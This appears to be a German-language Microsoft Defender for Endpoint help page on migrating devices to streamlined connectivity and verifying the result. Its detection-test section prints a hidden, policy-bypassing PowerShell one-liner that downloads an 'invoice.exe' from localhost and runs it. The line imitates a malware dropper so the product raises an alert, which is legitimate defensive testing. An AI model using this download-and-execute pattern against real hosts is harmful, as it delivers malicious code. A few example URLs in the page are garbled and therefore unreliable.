Freigeben über


Migrieren von Geräten zur Verwendung der optimierten Konnektivitätsmethode

Gilt für:

In diesem Artikel wird beschrieben, wie Geräte, die zuvor in Defender für Endpunkt integriert wurden, migriert (neu eingebunden) werden, um die optimierte Gerätekonnektivitätsmethode zu verwenden. Weitere Informationen zur optimierten Konnektivität finden Sie unter Onboarding von Geräten mit optimierter Konnektivität. Geräte müssen die unter Optimierte Konnektivität aufgeführten Voraussetzungen erfüllen.

In den meisten Fällen ist beim Reonboarding kein vollständiges Gerät offboarding erforderlich. Sie können das aktualisierte Onboardingpaket ausführen und Ihr Gerät neu starten, um die Konnektivität zu wechseln. Weitere Informationen zu den einzelnen Betriebssystemen finden Sie in den folgenden Informationen.

Wichtig

Einschränkungen und bekannte Probleme:

  • Wir haben ein Back-End-Problem mit dem Auffüllen der ConnectivityType Spalte in der DeviceInfo table erweiterten Suche gefunden, damit Sie den Migrationsfortschritt nachverfolgen können. Wir sind bestrebt, dieses Problem so schnell wie möglich zu beheben.
  • Für Gerätemigrationen (Reonboarding): Offboarding ist nicht erforderlich, um zur optimierten Konnektivitätsmethode zu wechseln. Sobald das aktualisierte Onboardingpaket ausgeführt wird, ist ein vollständiger Geräteneustart für Windows-Geräte und ein Dienstneustart für macOS und Linux erforderlich. Weitere Informationen finden Sie in den Details in diesem Artikel.
  • Windows 10 Versionen 1607, 1703, 1709 und 1803 unterstützen das Erneute Onboarding nicht. Offboarden Sie zuerst, und führen Sie dann das Onboarding mithilfe des aktualisierten Pakets aus. Diese Versionen erfordern auch eine längere URL-Liste.
  • Geräte, auf denen der MMA-Agent ausgeführt wird, werden nicht unterstützt und müssen weiterhin die MMA-Onboardingmethode verwenden.

Migrieren von Geräten mit der optimierten Methode

Migrationsempfehlung

  • Beginnen Sie klein. Es wird empfohlen, zuerst mit einer kleinen Gruppe von Geräten zu beginnen. Wenden Sie das Onboardingblob mit einem der unterstützten Bereitstellungstools an, und überwachen Sie dann die Konnektivität. Wenn Sie eine neue Onboardingrichtlinie verwenden, stellen Sie zur Vermeidung von Konflikten sicher, dass Sie das Gerät von allen anderen vorhandenen Onboardingrichtlinien ausschließen.

  • Überprüfen und überwachen. Überprüfen Sie nach dem Onboarding der kleinen Geräte, ob geräte erfolgreich integriert wurden und mit dem Dienst kommunizieren.

  • Schließen Sie die Migration ab. In diesem Stadium können Sie die Migration schrittweise auf eine größere Gruppe von Geräten ausführen. Um die Migration abzuschließen, können Sie vorherige Onboardingrichtlinien ersetzen und die alten URLs von Ihrem Netzwerkgerät entfernen.

Überprüfen Sie die Gerätevoraussetzungen , bevor Sie mit Migrationen fortfahren. Diese Informationen bauen auf dem vorherigen Artikel auf und konzentrieren sich auf die Migration vorhandener Geräte.

Zum erneuten Onboarding von Geräten müssen Sie das optimierte Onboarding-Paket verwenden. Weitere Informationen zum Zugriff auf das Paket finden Sie unter Optimierte Konnektivität.

Abhängig vom Betriebssystem erfordern Migrationen möglicherweise einen Geräteneustart oder einen Dienstneustart, nachdem das Onboardingpaket angewendet wurde:

  • Windows: Starten Sie das Gerät neu.

  • macOS: Starten Sie das Gerät neu, oder starten Sie den Defender für Endpunkt-Dienst neu, indem Sie Folgendes ausführen:

    1. sudo launchctl unload /Library/LaunchDaemons/com.microsoft.fresno.plist
    2. sudo launchctl load /Library/LaunchDaemons/com.microsoft.fresno.plist
  • Linux: Starten Sie den Defender für Endpunkt-Dienst neu, indem Sie Folgendes ausführen: sudo systemctl restart mdatp

In der folgenden Tabelle sind Die Migrationsanweisungen für die verfügbaren Onboardingtools basierend auf dem Betriebssystem des Geräts aufgeführt.

Windows 10 und 11

Wichtig

Windows 10 Version 1607, 1703, 1709 und 1803 unterstützen das Reonboarding nicht. Um vorhandene Geräte zu migrieren, müssen Sie das onboarding-Paket vollständig offboarden und integrieren.

Allgemeine Informationen zum Onboarding von Windows-Clientgeräten finden Sie unter Onboarding Windows Client.

Vergewissern Sie sich, dass die Voraussetzungen erfüllt sind: Voraussetzungen für die Verwendung einer optimierten Methode.

Lokales Skript

Befolgen Sie die Anleitung unter Lokales Skript (bis zu 10 Geräte) mithilfe des optimierten Onboardingpakets. Nach Abschluss der Schritte müssen Sie das Gerät neu starten, damit die Gerätekonnektivität umgeschaltet werden kann.

Gruppenrichtlinie

Befolgen Sie die Anleitung unter Gruppenrichtlinie mithilfe des optimierten Onboardingpakets. Nach Abschluss der Schritte müssen Sie das Gerät neu starten, damit die Gerätekonnektivität umgeschaltet werden kann.

Microsoft Intune

Befolgen Sie die Anleitung unter Intune Verwenden des optimierten Onboardingpakets. Sie können die Option "auto from connector" verwenden. Diese Option wendet das Onboardingpaket jedoch nicht automatisch erneut an. Create eine neue Onboardingrichtlinie und richten Sie zuerst eine Testgruppe ein. Nach Abschluss der Schritte müssen Sie das Gerät neu starten, damit die Gerätekonnektivität umgeschaltet werden kann.

Microsoft Configuration Manager

Befolgen Sie die Anweisungen in Configuration Manager.

VDI

Verwenden Sie die Anleitung unter Onboarding von nicht persistenten VDI-Geräten (Virtual Desktop Infrastructure). Nach Abschluss der Schritte müssen Sie das Gerät neu starten, damit die Gerätekonnektivität umgeschaltet werden kann.

Überprüfen der Gerätekonnektivität mit optimierter Methode für migrierte Geräte

Sie können die folgenden Methoden verwenden, um zu überprüfen, ob Sie Windows-Geräte erfolgreich verbunden haben:

Für macOS und Linux können Sie die folgenden Methoden verwenden:

  • MDATP-Konnektivitätstests
  • Nachverfolgung mit erweiterter Suche in Microsoft Defender XDR
  • Ausführen von Tests zum Bestätigen der Konnektivität mit Defender für Endpunkt-Diensten

Verwenden von Defender für Endpunkt Client Analyzer (Windows) zum Überprüfen der Konnektivität nach dem Onboarding für migrierte Endpunkte

Führen Sie nach dem Onboarding die MDE Client Analyzer aus, um zu bestätigen, dass Ihr Gerät eine Verbindung mit den entsprechenden aktualisierten URLs herstellt.

Laden Sie das Microsoft Defender for Endpoint Client Analyzer-Tool herunter, in dem der Defender für Endpunkt-Sensor ausgeführt wird.

Sie können die gleichen Anweisungen wie unter Überprüfen der Clientkonnektivität mit Microsoft Defender for Endpoint Dienst befolgen. Das Skript verwendet automatisch das onboarding-Paket, das auf dem Gerät konfiguriert ist (die Version sollte optimiert werden), um die Konnektivität zu testen.

Stellen Sie sicher, dass die Verbindung mit den entsprechenden URLs hergestellt wird.

Nachverfolgung mit erweiterter Suche in Microsoft Defender XDR

Sie können die erweiterte Suche in Microsoft Defender Portal verwenden, um den Konnektivitätstyp status anzuzeigen.

Diese Informationen finden Sie in der Tabelle DeviceInfo in der Spalte "ConnectivityType":

  • Spaltenname: ConnectivityType
  • Mögliche Werte: <blank>, Optimiert, Standard
  • Datentyp: String
  • Beschreibung: Art der Konnektivität vom Gerät zur Cloud

Sobald ein Gerät zur Verwendung der optimierten Methode migriert wurde und das Gerät eine erfolgreiche Kommunikation mit dem EDR-Befehl & Steuerkanal herstellt, wird der Wert als "Optimiert" dargestellt.

Wenn Sie das Gerät zurück zur regulären Methode verschieben, lautet der Wert "standard".

Für Geräte, die noch nicht versucht haben, ein erneutes Onboarden durchzuführen, bleibt der Wert leer.

Lokale Nachverfolgung auf einem Gerät über Windows Ereignisanzeige

Sie können das SENSE-Betriebsprotokoll von Windows Ereignisanzeige verwenden, um Verbindungen mit dem neuen optimierten Ansatz lokal zu überprüfen. SENSE-Ereignis-ID 4 verfolgt erfolgreiche EDR-Verbindungen nach.

Öffnen Sie das Ereignisprotokoll des Defender für Endpunkt-Diensts mit den folgenden Schritten:

  1. Wählen Sie im Windows-Menü Start aus, und geben Sie dann Ereignisanzeige ein. Wählen Sie dann Ereignisanzeige aus.

  2. Scrollen Sie in der Protokollliste unter Protokollzusammenfassung nach unten, bis Microsoft-Windows-SENSE/Operational angezeigt wird. Doppelklicken Sie auf das Element, um das Protokoll zu öffnen.

    Screenshot: Ereignisanzeige mit Dem Abschnitt

    Sie können auch auf das Protokoll zugreifen, indem SieAnwendungs- und Dienstprotokolle>Microsoft>Windows>SENSE erweitern und Betriebsbereit auswählen.

  3. Ereignis-ID 4 verfolgt erfolgreiche Verbindungen mit Defender for Endpoint Command & Control-Kanal nach. Überprüfen Sie erfolgreiche Verbindungen mit der aktualisierten URL. Zum Beispiel:

    Contacted server 6 times, all succeeded, URI: <region>.<geo>.endpoint.security.microsoft.com.
    <EventData>
     <Data Name="UInt1">6</Data>
     <Data Name="Message1">https://<region>.<geo>.endpoint.security.microsoft.com>
    </EventData>
    
  4. Nachricht 1 enthält die URL für die Kontaktaufnahme. Vergewissern Sie sich, dass das Ereignis die optimierte URL (endpoint.security.microsoft, com) enthält.

  5. Ereignis-ID 5 verfolgt Ggf. Fehler nach.

Hinweis

SENSE ist der interne Name, mit dem auf den Verhaltenssensor verwiesen wird, der Microsoft Defender for Endpoint antreibt.
Vom Dienst aufgezeichnete Ereignisse werden im Protokoll angezeigt.
Weitere Informationen finden Sie unter Überprüfen von Ereignissen und Fehlern mithilfe von Ereignisanzeige.

Ausführen von Tests zum Bestätigen der Konnektivität mit Defender für Endpunkt-Diensten

Nachdem das Gerät in Defender für Endpunkt integriert wurde, überprüfen Sie, ob es weiterhin im Gerätebestand angezeigt wird. Die DeviceID sollte unverändert bleiben.

Überprüfen Sie die Registerkarte Geräteseitenzeitachse, um zu bestätigen, dass Ereignisse vom Gerät übertragen werden.

Live-Antwort

Stellen Sie sicher , dass Live Response auf Ihrem Testgerät funktioniert. Befolgen Sie die Anweisungen unter Untersuchen von Entitäten auf Geräten mithilfe von Liveantworten.

Stellen Sie sicher, dass Sie nach der Verbindung einige grundlegende Befehle ausführen, um die Konnektivität zu bestätigen (z. B. CD, Aufträge, Verbinden).

Automatische Untersuchung und Reaktion

Stellen Sie sicher, dass die automatisierte Untersuchung und Reaktion auf Ihrem Testgerät funktioniert: Konfigurieren Sie automatisierte Untersuchungs- und Antwortfunktionen.

Navigieren Sie für Testlabs für auto-IR zu Microsoft Defender XDR>Bewertungen & Tutorials>Tutorials & Simulationen> **Tutorials> Automatisierte Untersuchungstutorials.

Aus der Cloud gelieferter Schutz

  1. Öffnen Sie eine Eingabeaufforderung als Administrator.

  2. Klicken Sie im Startmenü mit der rechten Maustaste auf das Element, wählen Sie Als Administrator ausführen und dann an der Berechtigungsaufforderung Ja aus.

  3. Verwenden Sie das folgende Argument mit dem Microsoft Defender Antivirus-Befehlszeilenprogramm (mpcmdrun.exe), um zu überprüfen, ob Ihr Netzwerk mit dem Microsoft Defender Antivirus-Clouddienst kommunizieren kann:

    "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -ValidateMapsConnection
    

Hinweis

Dieser Befehl funktioniert nur unter Windows 10, Version 1703 oder höher, oder Windows 11. Weitere Informationen finden Sie unter Verwalten Microsoft Defender Antivirus mit dem mpcmdrun.exe-Befehlszeilentool.

Testblock beim ersten Sichten

Befolgen Sie die Anweisungen in Microsoft Defender for Endpoint BAFS-Demonstration (Block at First Sight).

SmartScreen testen

Befolgen Sie die Anweisungen in Microsoft Defender SmartScreen Demo (msft.net).

PowerShell-Erkennungstest

  1. Erstellen Sie auf dem Windows Gerät einen Ordner: C:\test-MDATP-test.

  2. Öffnen Sie die Eingabeaufforderung als Administrator.

  3. Führen Sie im Eingabeaufforderungsfenster den folgenden PowerShell-Befehl aus:

    powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
    

Nachdem der Befehl ausgeführt wurde, wird das Eingabeaufforderungsfenster automatisch geschlossen. Bei erfolgreicher Ausführung wird der Erkennungstest als abgeschlossen markiert.

Für macOS und Linux können Sie die folgenden Methoden verwenden:

  • MDATP-Konnektivitätstests
  • Nachverfolgung mit erweiterter Suche in Microsoft Defender XDR
  • Ausführen von Tests zum Bestätigen der Konnektivität mit Defender für Endpunkt-Diensten

MDATP-Konnektivitätstest (macOS und Linux)

Führen Sie aus mdatp health -details features , um simplified_connectivity zu bestätigen: "enabled".

Führen Sie aus mdatp health -details edr , um zu bestätigen, dass edr_partner_geo_location verfügbar ist. Der Wert sollte sein GW_<geo> , wobei "geo" der geografische Standort Ihres Mandanten ist.

Führen Sie einen mdatp-Konnektivitätstest aus. Stellen Sie sicher, dass das optimierte URL-Muster vorhanden ist. Sie sollten zwei für "\storage", eine für "\mdav", eine für "\xplat" und eine für "/packages" erwarten.

Beispiel: https:mdav.us.endpoint.security.microsoft/com/storage

Nachverfolgung mit erweiterter Suche in Microsoft Defender XDR

Befolgen Sie die gleichen Anweisungen wie für Windows.

Verwenden von Defender für Endpunkt Client Analyzer (plattformübergreifend) zum Überprüfen der Konnektivität für neu migrierte Endpunkte

Laden Sie die Clientanalyse für macOS oder Linux herunter, und führen Sie es aus. Weitere Informationen finden Sie unter Herunterladen und Ausführen des Clientanalysetools.

  1. Führen Sie mdeclientanalyzer.cmd -o <path to cmd file> im Ordner MDEClientAnalyzer aus. Der Befehl verwendet Parameter aus dem Onboardingpaket, um die Konnektivität zu testen.

  2. Führen Sie aus mdeclientanalyzer.cmd -g <GW_US, GW_UK, GW_EU> (wobei parameter von GW_US, GW_EU GW_UK ist). GW bezieht sich auf die optimierte Option. Führen Sie mit dem entsprechenden geografischen Mandanten aus.